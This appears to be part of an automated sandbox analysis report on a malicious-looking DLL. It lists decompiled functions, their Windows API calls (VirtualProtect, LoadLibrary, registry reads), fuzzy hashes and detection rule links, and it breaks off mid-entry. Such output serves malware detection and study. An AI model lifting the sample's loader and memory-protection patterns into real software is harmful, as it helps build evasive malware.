                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DBC40 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(046C158F,0000002C,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046DBC51
                • StrRChrA.SHLWAPI(046C158F,00000000,0000002F,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046DBC6A
                • StrTrimA.SHLWAPI(046C158F,?,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046DBC92
                • StrTrimA.SHLWAPI(00000000,?,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046DBCA1
                • HeapFree.KERNEL32(00000000,046C158F,046C158F,00000000,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,046DCB18,?,046C159F,046C158F,00000000,0000000B), ref: 046DBCD8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Trim$FreeHeap
                • String ID:
                • API String ID: 2132463267-0
                • Opcode ID: 86a2957503a6e673caed0e0cf21f65638579f98de7c53178b30c54423b7805b8
                • Instruction ID: 07f03a5be261bae5ee3e1c869fc210c85bf6c15da6192aea1a2de7460c734648
                • Opcode Fuzzy Hash: 86a2957503a6e673caed0e0cf21f65638579f98de7c53178b30c54423b7805b8
                • Instruction Fuzzy Hash: 9111B97660021BBBD7219A5ADC89FA77BECEB54B50F150026F904DB245FBB4FD018B90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D77FD Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,005A95A8,00000000,046C7B94,?,?,?,046CA457,74E05520,?,046DA6F4,00000000,00000000), ref: 046D7834
                • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,046CA457,74E05520,?,046DA6F4,00000000,00000000,?,00000000,046C7B94,00000000), ref: 046D7864
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D7873
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D7891
                • GetLastError.KERNEL32(?,046CA457,74E05520,?,046DA6F4,00000000,00000000,?,00000000,046C7B94,00000000), ref: 046D78A1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                • String ID:
                • API String ID: 653387826-0
                • Opcode ID: aa5547afb01059a3d90044c5f6789486a4049a4b7919398bbf8fe4c981825b95
                • Instruction ID: fab6caaafdd5a1b8aca1ed7d019466e6bed3db6b9bc61bf630e4915a5a1a8248
                • Opcode Fuzzy Hash: aa5547afb01059a3d90044c5f6789486a4049a4b7919398bbf8fe4c981825b95
                • Instruction Fuzzy Hash: DF21E7B5A00B02EFE711DFA9C985956BBF8FB08304B008569EA56D7750E774FD04CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DB1E4 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 046DB212
                • GetLastError.KERNEL32 ref: 046DB235
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046DB248
                • GetLastError.KERNEL32 ref: 046DB253
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DB29B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                • String ID:
                • API String ID: 1671499436-0
                • Opcode ID: f0573f18353b715c1bb759460a04dc738838cad252e791c9d8bde3aa26f2e969
                • Instruction ID: e85d8222a71bfbd29db00e0f44d1abbbe3ecb202207ba6e157d8f7f5fda7f004
                • Opcode Fuzzy Hash: f0573f18353b715c1bb759460a04dc738838cad252e791c9d8bde3aa26f2e969
                • Instruction Fuzzy Hash: A121A131900204EBEB209F95DC8CB6E7BB4FB50B18F614418E1529A2A4F779BE85DB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CF01C Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(046CB15D,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF039
                • memcpy.NTDLL(046CB15D,?,00000009,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF05B
                • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 046CF073
                • lstrlenW.KERNEL32(00000000,00000001,046CB15D,?,?,?,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF093
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,046CB15D,00000000,?), ref: 046CF0B8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                • String ID:
                • API String ID: 3065863707-0
                • Opcode ID: f00c483864d2c108072bfc9f70adf76d4956e567d9c83a4b2f4103b9f6c50759
                • Instruction ID: 37dd4615201f13c616be651e63a4f7a9075ea0481ead7a4ad0b5cdba8dab4dd3
                • Opcode Fuzzy Hash: f00c483864d2c108072bfc9f70adf76d4956e567d9c83a4b2f4103b9f6c50759
                • Instruction Fuzzy Hash: 01116635E40208BBDB11DB95D808FDE7BB9EB48710F004455F949E7280F679DA48CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CE6FF Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                Download Yara Rule
                APIs
                • lstrcmpi.KERNEL32(00000000,?), ref: 046CE72E
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046CE73B
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046CE74E
                • lstrcmpi.KERNEL32(046EE4C0,00000000), ref: 046CE76E
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046CC02E,00000000), ref: 046CE782
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                • String ID:
                • API String ID: 1266740956-0
                • Opcode ID: dac328e05494398f51953741ba51f7816eefea9be983e4087a50c823dbd03497
                • Instruction ID: e9f591711afcc938f3c4619b6fe10f93e0ebe2cfb7d96fd1254e787fdae2e3ff
                • Opcode Fuzzy Hash: dac328e05494398f51953741ba51f7816eefea9be983e4087a50c823dbd03497
                • Instruction Fuzzy Hash: 48117F31941205EFEB05DF5AD889AA9B7F8FB14334B044069E4099B290F73AED05CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C3FF7 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(046C158F,00000000,046E6C5B,00000000,046E4160,046C158F,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C4001
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(00000000,046C158F), ref: 046C4025
                • StrRChrA.SHLWAPI(046C158F,00000000,0000002E,?,00000003,?,?,046DCD80,?,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046C402C
                • lstrcpy.KERNEL32(00000000,?), ref: 046C4074
                • lstrcat.KERNEL32(00000000,?), ref: 046C4083
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                • String ID:
                • API String ID: 2616531654-0
                • Opcode ID: afd0921cd635080d3e8cd076315d08a74218fa356361ef85a10db13be9a787c4
                • Instruction ID: 7ff4597bebe1388c0af8a89f62d7cf70e7813b07941f3fcf8b77572f917fb845
                • Opcode Fuzzy Hash: afd0921cd635080d3e8cd076315d08a74218fa356361ef85a10db13be9a787c4
                • Instruction Fuzzy Hash: 0A115A76340206ABD320EF66E988E7B77ECEB84750F04452DF605C7242FB2AE8458772
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D265B Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046DBDF1: lstrlen.KERNEL32(?,00000001,?,00000008,046DD288,?,00000000,00000001,00000000,04C9C088,04C9C088,00000000,046C832B,00000000,?,?), ref: 046DBDFD
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046D2684
                • memcpy.NTDLL(00000000,?,?), ref: 046D2697
                • RtlEnterCriticalSection.NTDLL(046EE4A8), ref: 046D26A8
                • RtlLeaveCriticalSection.NTDLL(046EE4A8), ref: 046D26BD
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046D26F5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                • String ID:
                • API String ID: 2349942465-0
                • Opcode ID: 4d6ab8d7db3afbd9ae8b038eb22451068794f62d94af0049182442661e9e9b82
                • Instruction ID: 71bf0d12a6add35d5997b1277bac02f8867dbffe860411856cd60ecf85800178
                • Opcode Fuzzy Hash: 4d6ab8d7db3afbd9ae8b038eb22451068794f62d94af0049182442661e9e9b82
                • Instruction Fuzzy Hash: D611E576605351EFE711AF26DC44C2B7BE8EB85335705047EF80597240FA36AC058BB5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E4F92 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(046C78A1,00000000,00000000,00000000,?,046DAE43,?,046C78A1,00000000), ref: 046E4FA8
                • lstrlen.KERNEL32(?,?,046DAE43,?,046C78A1,00000000), ref: 046E4FAF
                • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 046E4FBD
                  • Part of subcall function 046CD2FC: GetLocalTime.KERNEL32(046DAE43,046DAE43,?,046C78A1,00000000), ref: 046CD306
                  • Part of subcall function 046CD2FC: wsprintfA.USER32 ref: 046CD339
                • wsprintfA.USER32 ref: 046E4FDF
                  • Part of subcall function 046E3B15: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,046E5007,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 046E3B33
                  • Part of subcall function 046E3B15: wsprintfA.USER32 ref: 046E3B58
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 046E5010
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                • String ID:
                • API String ID: 3847261958-0
                • Opcode ID: 7b1e1dc25693ff236910a5704ec414c0bb6c98060291948c5fecd2db565bd1e9
                • Instruction ID: 5a1a38d500a61b557d8bc11b713c130f4a9e054aabacc209887fd2f4e4913ced
                • Opcode Fuzzy Hash: 7b1e1dc25693ff236910a5704ec414c0bb6c98060291948c5fecd2db565bd1e9
                • Instruction Fuzzy Hash: 06015235540218BFDB216F56DC48DAB7FA9EB84364B004421FD099B211F6369D65DBB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DFEA4 Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 046DFEBB
                  • Part of subcall function 046C2A41: wcstombs.NTDLL ref: 046C2AFF
                • lstrlen.KERNEL32(?,?,?,?,?,046DF400,?,?), ref: 046DFEDE
                • lstrlen.KERNEL32(?,?,?,?,046DF400,?,?), ref: 046DFEE8
                • memcpy.NTDLL(?,?,00004000,?,?,046DF400,?,?), ref: 046DFEF9
                • HeapFree.KERNEL32(00000000,?,?,?,?,046DF400,?,?), ref: 046DFF1B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                • String ID:
                • API String ID: 1256246205-0
                • Opcode ID: 5d2519c16168153f032aa110d530ce6f3579a85b0b2dbbdd270b208290c0414e
                • Instruction ID: 5836509465b19015097b8a3b62c310bcea3f4b888eaab59a5c89e73d5054c9e1
                • Opcode Fuzzy Hash: 5d2519c16168153f032aa110d530ce6f3579a85b0b2dbbdd270b208290c0414e
                • Instruction Fuzzy Hash: 37118E75A00204FFDB249F55EC44F5A7BF9EB85310F104028E806E7250F632AD519B24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2E6E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,046D7126,?), ref: 046E2E9A
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046E2EAC
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EC9
                • lstrlenW.KERNEL32(00000000,?,?,046D7126,?), ref: 046E2ED5
                • HeapFree.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EE9
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                • String ID:
                • API String ID: 3403466626-0
                • Opcode ID: 8b37d7b70f2e9b2d00c40f054f019fe1cc7b48e2193c14664cdb2cea6d078e6d
                • Instruction ID: 7fa4afbb3ce3a6356a4af272ce9fd356738c971225092736947c87c4595c2a14
                • Opcode Fuzzy Hash: 8b37d7b70f2e9b2d00c40f054f019fe1cc7b48e2193c14664cdb2cea6d078e6d
                • Instruction Fuzzy Hash: 73018C72101214EFE312EF9AEC44FAA37ECEB48310F140065F504AB210E779AD058F75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DDC0D Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32 ref: 046DDC2D
                • GetModuleHandleA.KERNEL32 ref: 046DDC3B
                • LoadLibraryExW.KERNEL32(?,?,?), ref: 046DDC48
                • GetModuleHandleA.KERNEL32 ref: 046DDC5F
                • GetModuleHandleA.KERNEL32 ref: 046DDC6B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleModule$LibraryLoad
                • String ID:
                • API String ID: 1178273743-0
                • Opcode ID: 81cd00f212fcd5008c4619d697bae8dc8e34301e97b4b0dc63441cad89d12eaa
                • Instruction ID: c4f592555fd77c9f70f132b0e8ec95c63661e2b40d420eeafb0ef83e712b53be
                • Opcode Fuzzy Hash: 81cd00f212fcd5008c4619d697bae8dc8e34301e97b4b0dc63441cad89d12eaa
                • Instruction Fuzzy Hash: BD0186B1A0130ABF9B016F6AEC4096A7BEDFF14360704403AF814C7264FBB6DC219E90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E4923 Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,046C130F), ref: 046E4929
                • StrTrimA.SHLWAPI(00000001,?,?,046C130F), ref: 046E494C
                • StrTrimA.SHLWAPI(00000000,?,?,046C130F), ref: 046E495B
                • _strupr.NTDLL ref: 046E495E
                • lstrlen.KERNEL32(00000000,046C130F), ref: 046E4966
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Trim$_struprlstrlen
                • String ID:
                • API String ID: 2280331511-0
                • Opcode ID: ce2f9a031835542e0cdaa3d91914dc68dfcaba2ef540128eadd033a3cd7d81f7
                • Instruction ID: 3bed8b96a8c241bfbc9d9de2bf2d72c66407c8a9e9d6ba37a9e4d70dc3ef8df8
                • Opcode Fuzzy Hash: ce2f9a031835542e0cdaa3d91914dc68dfcaba2ef540128eadd033a3cd7d81f7
                • Instruction Fuzzy Hash: 54F09071701156AFE715EB36EC8CE7A3BECEB45654B101019F849CB241FF18AC018B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DA700 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(046EE480), ref: 046DA70B
                • RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046DA71C
                • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,046C9C93,00000000,?,046EE4A8,046D0749,00000003,?,?,?,046C8E76), ref: 046DA733
                • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,046C9C93,00000000,?,046EE4A8,046D0749,00000003,?,?,?,046C8E76), ref: 046DA74D
                • GetLastError.KERNEL32(?,?,046C9C93,00000000,?,046EE4A8,046D0749,00000003,?,?,?,046C8E76,00000000,?,00000029,046EE218), ref: 046DA75A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                • String ID:
                • API String ID: 653387826-0
                • Opcode ID: 2883646e55b95d7c04e1594af717b6d66dee6879a586892b57a620cd658a01e7
                • Instruction ID: 355c5cb9ca426a99d9c116436f479d31199e3b2249f2a187202fe975617db58c
                • Opcode Fuzzy Hash: 2883646e55b95d7c04e1594af717b6d66dee6879a586892b57a620cd658a01e7
                • Instruction Fuzzy Hash: 5401AD79600304EFD721AF66CC04D6AB7F9EF84320B108529EA529B390E771FD02CB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1500B Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C1500B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x1c1a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x1c1a2b4 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x1c1a2b0 = _t6;
					 *0x1c1a2bc = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x1c1a2ac = _t7;
					if(_t7 == 0) {
						 *0x1c1a2ac =  *0x1c1a2ac | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                0x01c15013
                0x01c1501b
                0x01c15020
                0x00000000
                0x01c15075
                0x01c15022
                0x01c1502a
                0x01c15032
                0x01c15032
                0x01c15072
                0x00000000
                0x01c15072
                0x01c15034
                0x01c15034
                0x01c15039
                0x01c1504b
                0x01c15050
                0x01c15056
                0x01c1505e
                0x01c15063
                0x01c15065
                0x01c15065
                0x00000000
                0x01c1506c
                0x01c1502e
                0x00000000
                0x00000000
                0x01c15030
                0x00000000

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01C16D63,?), ref: 01C15013
                • GetVersion.KERNEL32 ref: 01C15022
                • GetCurrentProcessId.KERNEL32 ref: 01C15039
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01C15056
                • GetLastError.KERNEL32 ref: 01C15075
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: 8623cc0dc49d4a90f05d80d2955e4a72b1fab5e402903020615d330918308b6b
                • Instruction ID: 1a421cfef2847200b8dd99a05e3757b929c67f47c037e2d78250840eb3edfd7a
                • Opcode Fuzzy Hash: 8623cc0dc49d4a90f05d80d2955e4a72b1fab5e402903020615d330918308b6b
                • Instruction Fuzzy Hash: 49F087306C2341EFE730CBA8A8287A63E60B7ABB50F004118E68BC72CCD271C101CF56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D7623 Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 046D7630
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046D7640
                • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046D7649
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,046DC365,?,?,00000040,?,?,?,?,?,?,046D5DB1), ref: 046D7667
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,046DC365,?,?,00000040,?,?,?,?,?,?,046D5DB1), ref: 046D7674
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                • String ID:
                • API String ID: 3667519916-0
                • Opcode ID: d54b9724530b8d82e3fb47c412f9149d243cf6fc65f99a2296b256a13cbc7d61
                • Instruction ID: e413ddaa4c65c11a7f0a60c55778f9463b80439aaf6fac7ad7741c5f83031b08
                • Opcode Fuzzy Hash: d54b9724530b8d82e3fb47c412f9149d243cf6fc65f99a2296b256a13cbc7d61
                • Instruction Fuzzy Hash: 81F01730600740AFE7307A3A9C88F2AB2E8EB94356F145618F54197690FB28FC05CA69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E3AA2 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                Download Yara Rule
                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,046CB037,?), ref: 046E3AAA
                • GetVersion.KERNEL32 ref: 046E3AB9
                • GetCurrentProcessId.KERNEL32 ref: 046E3AD0
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 046E3AED
                • GetLastError.KERNEL32 ref: 046E3B0C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: 1d0f09a29ac8a09e4679ebe78b23e9ac6dafa73eb72719b145a77f04ad9dd52c
                • Instruction ID: aba257891f8fd61049bfe116bf96548b9b5b8257fa82fc160f3fea41e3d35026
                • Opcode Fuzzy Hash: 1d0f09a29ac8a09e4679ebe78b23e9ac6dafa73eb72719b145a77f04ad9dd52c
                • Instruction Fuzzy Hash: 37F0AF70641302DEE7209F27E809B653BE0EB20704F206518E922CF3C0F37A58C1DB24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DB368 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 046DB38C
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • wsprintfA.USER32 ref: 046DB3BD
                  • Part of subcall function 046CE3A4: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,046C6410), ref: 046CE3BA
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE3E2
                  • Part of subcall function 046CE3A4: lstrlen.KERNEL32(?), ref: 046CE3F1
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE431
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE466
                  • Part of subcall function 046CE3A4: memcpy.NTDLL(00000000,?,?), ref: 046CE473
                  • Part of subcall function 046CE3A4: memcpy.NTDLL(00000008,046E83F8,00000002,00000000,?,?), ref: 046CE488
                  • Part of subcall function 046CE3A4: wsprintfA.USER32 ref: 046CE4AB
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 046DB432
                  • Part of subcall function 046E5DDB: RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E5DF1
                  • Part of subcall function 046E5DDB: RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E5E0C
                • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 046DB41C
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 046DB428
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                • String ID:
                • API String ID: 3553201432-0
                • Opcode ID: c015825ab77aae39429010d0e7f781a0882d568b98ab9f572173e50f1a972a46
                • Instruction ID: 0f23ce84dd108906be374559ba0f12d2ec6478b4b80eab1eb4306a80abd5be16
                • Opcode Fuzzy Hash: c015825ab77aae39429010d0e7f781a0882d568b98ab9f572173e50f1a972a46
                • Instruction Fuzzy Hash: FC21FB76900249BFDF11DF96DC44C9F7BB9FF48304B04442AF9059A210E776AA60DF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C283E Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046E59C9: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 046E59E4
                  • Part of subcall function 046E59C9: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 046E5A32
                  • Part of subcall function 046E59C9: GetProcAddress.KERNEL32(00000000,?), ref: 046E5A4B
                  • Part of subcall function 046E59C9: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 046E5A9C
                • GetLastError.KERNEL32(?,?,?), ref: 046C29CC
                • FreeLibrary.KERNEL32(?,?,?), ref: 046C2A34
                Memory Dump Source
